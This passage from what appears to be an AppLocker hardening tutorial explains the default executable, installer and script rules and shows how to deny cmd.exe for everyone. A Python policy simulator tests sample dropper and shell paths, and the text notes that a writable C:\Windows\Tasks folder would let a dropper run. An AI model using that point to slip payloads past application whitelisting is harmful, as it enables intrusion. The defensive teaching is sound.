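                  UserOrGroupSid="S-1-5-32-544" Action="Allow">
      <Conditions><FilePathCondition Path="*"/></Conditions>
    </FilePathRule>
    <FilePathRule Id="rule-deny-cmd" Name="Block cmd.exe for everyone"
                  UserOrGroupSid="S-1-1-0" Action="Deny">
      <Conditions><FilePathCondition Path="%SYSTEM32%\cmd.exe"/></Conditions>
    </FilePathRule>
  </RuleCollection>
</AppLockerPolicy>
"""

USER = [EVERYONE]                   # a standard user
ADMIN = [EVERYONE, ADMINISTRATORS]  # administrators are also in Everyone

if __name__ == "__main__":
    for who, sids in (("user", USER), ("admin", ADMIN)):
        for p in (r"C:\Windows\System32\notepad.exe", r"C:\Windows\System32\cmd.exe",
                  r"C:\Windows\Tasks\dropper.exe", r"C:\Users\raj\Downloads\shell.exe"):
            print(who, p, evaluate(POLICY, "Exe", p, sids))
```

Two results are worth noting: the Deny rule for Everyone blocks cmd.exe for administrators too, because they are members of Everyone and an explicit deny is never overridden; and without the two exceptions a standard user’s dropper in C:\Windows\Tasks would be allowed by the default Windows-folder rule, which is exactly why the page warns about writable subfolders under an allowed path.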

Modify Windows Installer Default Rules to Allow an App

Windows Installer Default Rule Types Include:

  • Allow members of the local Administrators group to run all Windows Installer files.
  • Allow members of the Everyone group to run all digitally signed Windows Installer files.
  • Allow members of the Everyone group to run all Windows Installer files that are located in the Windows\Installer folder.

Similarly if you want to modify Windows Install default rules, then repeat above steps.

Wildcard characters can be used as values in the publisher rule fields according to the following specifications:

Publisher: The asterisk (*) character used by itself represents any publisher.

Product name: The asterisk (*) character used by itself represents any product name.

File name: Either the asterisk (*) or question mark (?) characters used by themselves represent any and all file names.

File version: The asterisk (*) character used by itself represents any file version. If you want to limit the file version to a specific version or as a starting point, you can state the file version and then use the following options to apply limits:

  • Exactly. The rule applies only to this version of the app
  • And above. The rule applies to this version and all later versions.
  • And Below. The rule applies to this version and all earlier versions.

Open Exceptions and then again select Publisher.

Modify Script Default Rules to Allow an App

Script Default Rule Types Include:

  • Allow members of the local Administrators group to run all scripts.
  • Allow members of the Everyone group to run scripts that are located in the Program Files folder.
  • Allow members of the Everyone group to run scripts that are located in the Windows folder.

Similarly if you want to modify Script default rules, then repeat above steps.

Select the file or folder path that this rule should affect.

Open Exceptions and then again select Publisher.


In this way, you can implement Default rules and modify them for Executable file, Script rules or Windows Installer files according to your situation.

Creating New Rules to Block an APP

If you want to make your own rule to allow or deny an application, choose the “Create New Rule” option shown below. Let’s say I want to create a new executable rule that restricts command prompt execution for everyone.

You then get a wizard that helps you create an AppLocker rule based on file attributes such as the file path and digital signature.

NOTE: Install the applications you want to create rules for on this computer.

Now choose the action and the user or group that this rule should apply to. A deny action prevents the affected file from running.

Select the type of primary condition you would like to create. Here we chose the “Publisher” option.

Browse for a signed file to use as a reference for the rule. Here we browsed to cmd.exe and then clicked Next.

Choose the Publisher as exception and then click Next.

And finally, this will add your rule to restrict the cmd.exe.

Set the Application Identity service to Automatic:

AppLocker depends on the Application Identity service; if it is not running, no rules are enforced. Navigate to its properties through Computer Configuration > Policies > Windows Settings > Security Settings > System Services > Application Identity.

Then select “Automatic” as the service startup mode.

Now refresh Group Policy with the gpupdate command.

Now when you try to open the command prompt “cmd.exe”, you get a message that the program has been blocked by group policy, as shown.

Note: If you are configuring these rules on a single machine, it takes some time for the rule to take effect.

Reference: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/applocker/working-with-applocker-rules

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here